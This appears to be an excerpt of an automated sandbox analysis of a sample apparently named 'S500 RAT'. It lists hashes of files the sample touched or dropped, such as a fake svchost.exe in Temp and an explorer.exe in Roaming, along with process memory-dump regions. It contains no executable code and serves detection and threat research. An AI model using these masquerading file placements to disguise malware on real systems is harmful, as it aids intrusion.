| SHA512 | 0701b033ae9416a9d41761cd5382b03327ee91f2bad76d96d197d75318bb377e5e849cf5e47177c49b37fcb467702fe4e702a9b1c3c13382348436defdcf8a31 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ab21fdfa-129e-4c38-9637-3c52f9d33bb2.tmp
| MD5 | 1277f1e51603f6f41ebdf61ab03dd0a6 |
| SHA1 | d4d347b1b41b11d2e4aa7a67a6c6e63982a8d38f |
| SHA256 | 2292bf4a0ffe617214e7368b44b0470a819a53cd4821e206c6d5ca40018ceeaa |
| SHA512 | 31afd54f372273436341999005f5f5e001ab1f195f2ac78f4a35dad16ef919db47625299374e15265a3c530fe17bdcea4fd67e29c4e29ca1b161dfcfa297ab5d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d60186b1508f394872b3cafd4a9dbe68 |
| SHA1 | 73e63e5b502943443a7fccac57acfe6b5595de43 |
| SHA256 | bc432f0b4c185b17d291d25aabc1b5e4854e3677e9730c7f0de7182594bce067 |
| SHA512 | 0941a6a3de156d91d535e49ad2e872d281492d5bfce8d84de401aa3f11d3e0984a5247815efa62bc33d486503bcd302d3c637e1c1a8c17e2fb0a7470c636d1ad |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f78210101ce7b7ebc77fca102889483c |
| SHA1 | e8a8ab4634b95840a990168ddf2a424d041425e5 |
| SHA256 | 1ae3a97c4ee0b1cd8b97cc7228e770f8b5d59c8cabe5cdeac3065d4278d479a0 |
| SHA512 | f9f8a141edecedc2541f9c2fdceef64b705a3a70098c2f17c69af5971607fc8673f346e66852b22212065eb345dd641940495f3fe226edf57cc7d94b72af2eae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5a95222fdb9782ae8c413036d7cc155a |
| SHA1 | 42cadfaba3580b6c1af1ecbecb98aa1edd8e26c7 |
| SHA256 | 992f2673dc1e66274790d269c085ad13bd754461a4f502c09b8cd1750c711c49 |
| SHA512 | cc477a9b63b25189069edbbedc8a7ed95d7c392397e426a83e05b89ed6055a71ba7db7eac46b06b5663275f27b56a069d657e045bc0a0a49acb6dc4d1bacd164 |
C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3df2138cb6434a325aab0d988a9e5373 |
| SHA1 | 85870c7017215c04de646964e2671f614f548bb5 |
| SHA256 | 44788b3cdb8fce1a0156c90f73434cc417fcb98cf34545d82dc17fe6f5843040 |
| SHA512 | 807820e0b54f67acb46c169e38bb6d53c6e806139f4791a242bf6f59e6522d501c6fe63c3c589aeadf02c014e24329f33c1ed136abccbc278f4ec1549852bf60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 7194e6493ad2747898f5dad893f80f83 |
| SHA1 | 53673ef5cc6cbf2c95f52c53561af2df98ec1ca8 |
| SHA256 | 50f059eb82f118579272b2d8248333252955363bb8eb5e023782594bfeaa5dd0 |
| SHA512 | ca55ebb175e42d60650ce639b9d237d2e71081bd3186a09bdb09ce81c200d3109d45ec8daa44c6fd7035039c4c686b083b76a0bdc6aba4c020a074d1893c9bf8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fef5f30fe1b54fba410ef91a7a017ab4 |
| SHA1 | 62c7d232a95a7b40ad10e395da8403e915327220 |
| SHA256 | ab9d6bce034218737228023d0f6f1091ea79157e296b9557963508379b9dccb6 |
| SHA512 | 2800446cf7189a78c23b5f4363bf22900045b8bef394f1222c447541cf6dd46ca5cbe5958e43960500227250bc5ce5db5080577d96e9f6f27bcad099c9485481 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e05776b5f163a10fa6f1109ed112231 |
| SHA1 | e3a9bdfc710b6a46d5b5c614a589dbe0b0fe79e6 |
| SHA256 | 7d0ad4464357229df6892c7d9bd0acbb28447322e0bd64dea7e34bf0dbfddfef |
| SHA512 | fa46860df5b4a7961f0a6c634cb19d75299407ae6ffb0a13907502e244a84b5394d8fdf00e10755a44833f177b6428d6940f7a970bb6dcdca8d4884b1973965f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ce8cf3c8ab49fc0c416ac94820ab4916 |
| SHA1 | 8008482610bfb94717aafaf40ab24bee04d0b9b4 |
| SHA256 | cb57180c604213b5e4239028dab4e96ab78ac7d3d2694acbe3264a6321b3a5f6 |
| SHA512 | 5ab33f0ba921489664c904c7e90ea75db139022bc95aea3512b8e803462d7c48cc3a5125734409f10435c5f73e3cc78ca0fa86b1474182c2f8b417b56f85d19d |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 2ef91bf37b3da8cad6751b665bd4e6af |
| SHA1 | 5c15bbc721f91855388861d378cf9d26a140cead |
| SHA256 | 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7 |
| SHA512 | 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3 |
C:\Users\Admin\AppData\Roaming\explorer.exe
| MD5 | ce453607540a4b0e0c88476042d31791 |
| SHA1 | 9fe09b42424e044a7c11aea2f214a3d86de8f5a1 |
| SHA256 | 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c |
| SHA512 | f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee |
memory/1616-461-0x0000000000FA0000-0x000000000100D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
memory/5244-485-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\python310.dll
| MD5 | 3f782cf7874b03c1d20ed90d370f4329 |
| SHA1 | 08a2b4a21092321de1dcad1bb2afb660b0fa7749 |
| SHA256 | 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6 |
| SHA512 | 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857 |
C:\Users\Admin\AppData\Local\Temp\_MEI66042\base_library.zip
| MD5 | c4989bceb9e7e83078812c9532baeea7 |
| SHA1 | aafb66ebdb5edc327d7cb6632eb80742be1ad2eb |
| SHA256 | a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd |
| SHA512 | fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671 |
memory/3836-494-0x0000000005190000-0x00000000051C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\unicodedata.pyd
| MD5 | dfa1f0cd0ad295b31cb9dda2803bbd8c |
| SHA1 | cc68460feae2ff4e9d85a72be58c8011cb318bc2 |
| SHA256 | 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10 |
| SHA512 | 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e |
memory/5420-495-0x0000000074800000-0x0000000074FB1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\select.pyd
| MD5 | 5c66bcf3cc3c364ecac7cf40ad28d8f0 |
| SHA1 | faf0848c231bf120dc9f749f726c807874d9d612 |
| SHA256 | 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc |
| SHA512 | 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6 |
memory/5244-501-0x00007FFD51A20000-0x00007FFD51A44000-memory.dmp
memory/5420-502-0x00000000054C0000-0x0000000005AEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\libcrypto-1_1.dll
| MD5 | e5aecaf59c67d6dd7c7979dfb49ed3b0 |
| SHA1 | b0a292065e1b3875f015277b90d183b875451450 |
| SHA256 | 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1 |
| SHA512 | 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI66042\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
memory/3836-503-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5420-504-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3836-505-0x0000000005300000-0x0000000005310000-memory.dmp
memory/5244-506-0x00007FFD63E70000-0x00007FFD63E88000-memory.dmp
memory/5244-507-0x00007FFD50E00000-0x00007FFD50E2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI66042\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
memory/5244-508-0x00007FFD68B40000-0x00007FFD68B4F000-memory.dmp
memory/5420-509-0x0000000005200000-0x0000000005222000-memory.dmp
memory/5420-510-0x00000000052A0000-0x0000000005306000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ptvj2qfy.obx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5420-511-0x0000000005420000-0x0000000005486000-memory.dmp
memory/5420-525-0x0000000005CE0000-0x0000000006037000-memory.dmp
memory/5244-529-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp
memory/5420-532-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/5420-534-0x00000000060E0000-0x000000000612C000-memory.dmp
memory/1616-536-0x0000000003A00000-0x0000000003E00000-memory.dmp
memory/1616-538-0x0000000003A00000-0x0000000003E00000-memory.dmp
memory/1616-537-0x0000000003A00000-0x0000000003E00000-memory.dmp
memory/1616-540-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp
memory/1616-543-0x0000000003A00000-0x0000000003E00000-memory.dmp
memory/6924-544-0x0000000000110000-0x0000000000119000-memory.dmp
memory/1616-542-0x0000000075C50000-0x0000000075EA2000-memory.dmp
memory/1616-546-0x0000000000FA0000-0x000000000100D000-memory.dmp
memory/6924-548-0x0000000001F10000-0x0000000002310000-memory.dmp
memory/1616-549-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp
memory/6924-550-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp
memory/6924-551-0x0000000001F10000-0x0000000002310000-memory.dmp
memory/6924-554-0x0000000075C50000-0x0000000075EA2000-memory.dmp
memory/6924-553-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp
memory/5604-569-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp
memory/5604-570-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp
memory/5604-571-0x00007FFD6EF00000-0x00007FFD6EF0F000-memory.dmp
memory/5604-576-0x00007FFD68B40000-0x00007FFD68B4D000-memory.dmp
memory/5420-575-0x0000000007660000-0x0000000007CDA000-memory.dmp
memory/5604-579-0x00007FFD6AC70000-0x00007FFD6AC88000-memory.dmp
memory/6924-578-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp
memory/5420-577-0x00000000065C0000-0x00000000065DA000-memory.dmp
memory/5420-580-0x0000000008290000-0x0000000008836000-memory.dmp
memory/5420-581-0x00000000074F0000-0x0000000007582000-memory.dmp
memory/5604-573-0x00007FFD681D0000-0x00007FFD681E9000-memory.dmp
memory/6924-574-0x0000000001F10000-0x0000000002310000-memory.dmp
memory/5604-572-0x00007FFD6AC40000-0x00007FFD6AC6C000-memory.dmp
memory/3836-585-0x00000000709F0000-0x0000000070A3C000-memory.dmp
memory/3836-584-0x000000007F1C0000-0x000000007F1D0000-memory.dmp
memory/3836-582-0x0000000007800000-0x0000000007834000-memory.dmp
memory/5420-583-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/3836-594-0x0000000006C30000-0x0000000006C4E000-memory.dmp
memory/3836-595-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5420-597-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3836-598-0x0000000005300000-0x0000000005310000-memory.dmp
memory/5420-599-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3836-596-0x0000000007850000-0x00000000078F4000-memory.dmp
memory/3836-600-0x0000000007A40000-0x0000000007A4A000-memory.dmp
memory/3836-601-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/3836-602-0x0000000007BC0000-0x0000000007BD1000-memory.dmp
memory/3836-605-0x0000000007C00000-0x0000000007C0E000-memory.dmp
memory/3836-606-0x0000000007C10000-0x0000000007C25000-memory.dmp
memory/3836-607-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/3836-608-0x0000000007CF0000-0x0000000007CF8000-memory.dmp
memory/3836-611-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5420-613-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5604-618-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp
memory/5604-619-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp